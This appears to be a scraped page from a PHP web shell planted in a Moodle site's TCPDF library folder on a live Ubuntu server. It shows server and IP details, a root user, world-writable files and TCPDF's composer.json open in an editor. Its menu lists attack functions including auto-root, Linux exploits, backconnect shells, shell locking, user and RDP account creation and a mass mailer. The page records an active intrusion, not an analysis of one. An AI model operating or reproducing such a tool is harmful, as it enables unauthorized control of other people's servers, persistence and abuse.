Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.1
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
lib /
tcpdf /
[ HOME SHELL ]
Name
Size
Permission
Action
config
[ DIR ]
drwxrwxrwx
fonts
[ DIR ]
drwxrwxrwx
include
[ DIR ]
drwxrwxrwx
CHANGELOG.TXT
113.97
KB
-rwxrwxrwx
LICENSE.TXT
42.66
KB
-rwxrwxrwx
README.md
4.66
KB
-rwxrwxrwx
composer.json
1017
B
-rwxrwxrwx
readme_moodle.txt
3.07
KB
-rwxrwxrwx
tcpdf.php
879.39
KB
-rwxrwxrwx
tcpdf_autoconfig.php
6.99
KB
-rwxrwxrwx
tcpdf_barcodes_1d.php
71.68
KB
-rwxrwxrwx
tcpdf_barcodes_2d.php
14.34
KB
-rwxrwxrwx
tcpdf_parser.php
26.99
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "name": "tecnickcom/tcpdf", "version": "6.3.2", "homepage": "http://www.tcpdf.org/", "type": "library", "description": "TCPDF is a PHP class for generating PDF documents and barcodes.", "keywords": [ "PDF", "tcpdf", "PDFD32000-2008", "qrcode", "datamatrix", "pdf417", "barcodes" ], "license": "LGPL-3.0", "authors": [ { "name": "Nicola Asuni", "email": "info@tecnick.com", "role": "lead" } ], "require": { "php": ">=5.3.0" }, "autoload": { "classmap": [ "config", "include", "tcpdf.php", "tcpdf_parser.php", "tcpdf_barcodes_1d.php", "tcpdf_barcodes_2d.php", "include/tcpdf_colors.php", "include/tcpdf_filters.php", "include/tcpdf_font_data.php", "include/tcpdf_fonts.php", "include/tcpdf_images.php", "include/tcpdf_static.php", "include/barcodes/datamatrix.php", "include/barcodes/pdf417.php", "include/barcodes/qrcode.php" ] } }
Close